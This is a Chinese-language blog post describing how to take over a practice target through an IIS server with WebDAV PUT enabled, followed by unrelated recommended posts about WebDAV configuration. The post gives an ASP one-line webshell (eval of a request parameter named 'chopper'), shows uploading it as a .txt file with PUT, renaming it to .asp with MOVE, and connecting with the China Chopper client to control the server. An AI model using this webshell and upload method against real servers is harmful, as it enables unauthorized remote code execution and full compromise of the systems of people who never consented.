WebDAV file权限问题

最新推荐文章于 2024-07-09 11:29:36 发布
最新推荐文章于 2024-07-09 11:29:36 发布
阅读量8.9k 收藏 3
点赞数
分类专栏: 安全漏洞 文章标签: WebDAV file权限问题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sdb5858874/article/details/80530760
版权
使用一句话木马拿下一个靶机。。。
1.首先先登录一个开有WebDAV的网站,打开brupsuit,将网站代理设置为127.0.0.1:8080

具体哪个代理如上所示

2.然后将将拦截的有IP的那个包发到Repeater
在第一行输入OPTIONS,测试一下看该IIS组件是否开启了PUT(文件上传)功能

3.通过上述显示可以看到PUT功能已经开启,然后在服务器根目录下上传一个chao.txt的文件
在里面写入一句话木马:      <%eval request("chopper")%>
这是一个asp文件的脚本
具体操作如下


4.然后使用MOVE命令将chao.txt改名为chao.asp具体操作如下

5.然后再在网页上输入IP+刚刚上传的文件

没有报错的话,就是上传成功
6.然后打开菜刀
点击鼠标右键添加
将刚刚那个网站的IP+你上传文件的名字写上
再在后面添加刚刚一句话木马里的参数  chopper  (这个就是密码)
在文件类型里选择asp。
ASP:    <%eval request("chopper")%>
然后就拿下了




白帽梦想家
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
macbook没有权限打开文件_记录我曲折的webDav配置之路(macbook篇)
weixin_39551462的博客
11-24 1407
给自己的iOS app写网络功能,从零学起,找资料,配置apache服务器。捣鼓几下终于可以浏览器访问了。但MKNetworkKit玩不转,怒而转AFNetworking。然后GET方式下载数据也成功了。但上传一直弄不好。反复看视频教程发现用POST请求必须在服务器端有脚本(html或php)支持,但现在我还不会啊。想省事用PUT方法,视频里介绍apache扩展一个webDav服务器,上传文件就像...
上传文件超过1Mb,返回413错误
u010113247的博客
02-20 2536
   近期手头上有一个项目在整体上云,期间遇到一个Cloud storage上传文件超过限制的问题,在此记录一下。    背景是:IBM Cloud的K8s + PersistentVolumeClaim + Webdav + Ingress(Nginx)    详细情况是 有许多项目部署在K8s集群上,并且用PersistentVolumeClaim(大小为20G)做为一块虚拟的磁盘,存储项...
群晖NAS配置WebDav服务结合内网穿透实现跨平台云同步思源笔记
最新发布
m0_73879806的博客
07-09 1188
本教程主要分享如何将思源笔记、cpolar内网穿透和群晖WebDav三者相结合,实现思源笔记的云同步功能。具体而言,我们利用cpolar将群晖NAS上的WebDav服务暴露到公网上,然后在思源笔记中配置该公网地址作为同步目标。这样,无论用户身处何地,只要能够访问互联网,就可以实现思源笔记的实时同步和共享。当下,信息的同步与共享变得尤为重要,传统的文件同步方案往往受限于网络环境和设备限制,使得文件同步变得复杂且不稳定。
webdav超出文件传输限制的处理办法
白夜流歌的笔记簿
09-06 5375
webdav超出文件传输限制的处理办法
[服务器][服务][教程]Windows Server 2022开启WebDAV享受媒体影音以及用户权限设置
qq_38844263的博客
01-11 7335
WebDAV配置以及报错解决
WebDav以及IIS上传文件大小限制
weixin_40029679的博客
05-16 7695
点击站点 配置编辑器:下system.web/httpRunTime/maxRequestLength 修改大小既 是以K为单位
错误 0x800700DF 文件大小超出允许的限制,无法保存
蓝桉的博客
09-16 4874
修改本地注册表配置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WebClient\Parameters,找到FileSizeLimitInBytes值,其默认值为:50000000,修改其十进制为:4294967295。链接共享盘,从共享盘复制apk文件到桌面报错提示: 错误 0x800700DF︰ 文件大小超过了允许的限制,无法保存。打开本地电脑注册表:Win+R——输入cmd,回车——命令页输入: regedit,回车。
filemanager一个文件管理器和WebDAV可用作中间件或独立应用程序
08-11
在开发filemanager时,开发者可能面临一些挑战,如处理大文件时的性能优化、确保跨浏览器兼容性、实现安全的文件操作(防止恶意文件上传或权限越界)、以及设计直观易用的用户界面。为了提升用户体验,filemanager...
webdav-example
03-25
它支持创建、删除、重命名、移动、复制文件和目录,以及进行版本控制和权限管理。JavaScript,作为广泛应用于浏览器端的脚本语言,通过XMLHttpRequest或fetch API可以与WebDAV服务器进行交互。 首先,让我们了解...
OS + Linux File nfs / samba / rsync / inotify / smb / webdav
03-21
标题 "OS + Linux File nfs / samba / rsync / inotify / smb / webdav" 涉及的是Linux系统中的文件共享与同步技术。这些技术在多台计算机之间进行数据交互、协作工作或者备份中起到关键作用。下面将详细阐述每个...
share_file
02-13
10. **错误处理与日志记录**:确保系统稳定性和可维护性,通过记录和分析日志找出并解决问题。 11. **性能优化**:如文件切片上传、CDN(内容分发网络)加速文件下载,提高用户体验。 12. **API设计**:如果"share...
基于php的webdav协议的项目
02-19
7. **日志和调试**:为了追踪问题,服务器应记录请求和响应的详细信息。PHP的error_log函数可以帮助记录错误和警告。 在"phpdav-master"这个项目中,源代码将涵盖以上提到的所有方面,包括设置路由、处理身份验证、...
webdav服务器文件大小限制,Atitit webdav大文件上传的解决方案
weixin_35757191的博客
08-11 7857
Atitit webdav大文件上传的解决方案目录Upload file thro webdav client java api解决方法,可以修改本地电脑注册表:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WebClient\Parameters找到FileSizeLimitInBytes值,修改其十进制为:4294967295再重新在...
错误0x800700DF 文件大小超出允许的限制
鸿仔的博客
10-08 1812
错误0x800700DF 文件大小超出允许的限制的解决办法
如何解决IIS7上传文件大小限制【转】
weixin_30340819的博客
04-24 563
IIS7 默认文件上传大小是30M,那么超过30M的文件就无法上传了,那么就需要对IIS的配置文件进行修改。 在实际应用中往往会出现上传文件太大,无法上传的情况,那是因为IIS对上传文件大小有限制,IIS7 默认文件上传大小是30M,要突破这个限制需要做一下修改: 1.打开 %windir%\system32\inetsrv\config\applicationhost.config 找到...
Nginx上传文件大小、超时限制
热门推荐
大宇的博客,欢迎访问
02-02 1万+
修改Nginx上传文件大小限制   我们使用ngnix做web server的时候,nginx对上传文件的大小有限制,默认是1M。   当超过大小的时候会报413(too large)错误。这个时候我们要修改nginx的参数client_max_body_size 20M; location / { ... client_max_body_size 100m; } ...
解决使用内网穿透进行访问win10搭建的webdav服务中的一些问题
weixin_56382610的博客
04-13 1758
在“设置凭据”窗口中,填写你登录Windows 10的用户名和密码,然后依次全部确定,回到IIS。连接上隧道后使用所提供的http://域名+端口访问会提示:很抱歉,请联系机房域名过白。使用樱花frp进行内网穿透时,最开始建立隧道选择的节点是不可建站的如下图。点击“编辑虚拟目录”窗口中的“测试设置”,发现“授权”报错。此时使用https://域名+端口访问即可恢复正常。在“连接为”窗口中,选择“特定用户”,并点击“设置”回到“编辑虚拟目录”窗口,点击“连接为”回到在IIS中,查看“基本设置”
Zotero坚果云备份,提示【拒绝许可】的解决方案
weixin_43316148的博客
01-16 1562
不是你坚果云的密码!不是你 zotero 的密码!是【坚果云——账户信息——安全选项——创建应用】的应用密码。,不是真的填写你坚果云的用户名,是注册邮箱!坚果云的用户名和注册邮箱是不一样的!请检查文件同步设置或联系您的 WebDAV 服务器管理员。WebDAV 服务器不接受您输入的用户名及密码。具体可以参考官方页面的示例,完全扒过去。
webdav映射网络驱动器有关问题
奔腾年代
11-12 4046
我遇到的问题,是上传时报错,提示超出文件大小限制。网络搜索全都是下面这样的解决方案。反复检查了注册表还有webdav的基本设置,明明已经修改了注册表,为啥还是提示出错?然后突然意识到,我的操作是向服务器上传,而不是客户端下载。
obsidian webdav
09-18
Obsidian WebDAV 是一种用于在互联网上共享文档和文件的协议。WebDAV 是 "Web 分布式作者和版本控制" 的缩写。通过使用 Obsidian WebDAV,用户可以通过网络访问服务器上的文件和文件夹,并可以进行文件的上传、下载、修改和删除等操作。 使用 Obsidian WebDAV,可以实现跨平台和跨设备的文件共享和同步。用户可以在不同的设备上安装并配置 WebDAV 客户端,然后通过互联网连接到服务器上的文件库,实现实时的文件同步和共享。无论是在电脑、平板还是手机上,用户都可以轻松地访问和管理文件。 Obsidian WebDAV 还支持对文件夹和文件夹内容的细粒度权限控制。管理员可以为不同的用户或用户组分配不同的权限,以实现对文件和文件夹的保护和访问控制。这样可以确保文件的安全性和私密性,并防止未经授权的访问或修改。 此外,Obsidian WebDAV 还提供了高效的文件传输和访问速度。基于 HTTP 和 HTTPS 协议,Obsidian WebDAV 在文件传输过程中采用了压缩和优化技术,提供了稳定且快速的文件传输速度。用户可以快速地上传和下载大文件,提高工作效率。 综上所述,Obsidian WebDAV 是一种方便、安全且高效的文件共享和同步协议。它使用户能够跨平台和跨设备地访问和管理文件,实现团队协作和工作效率的提升。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值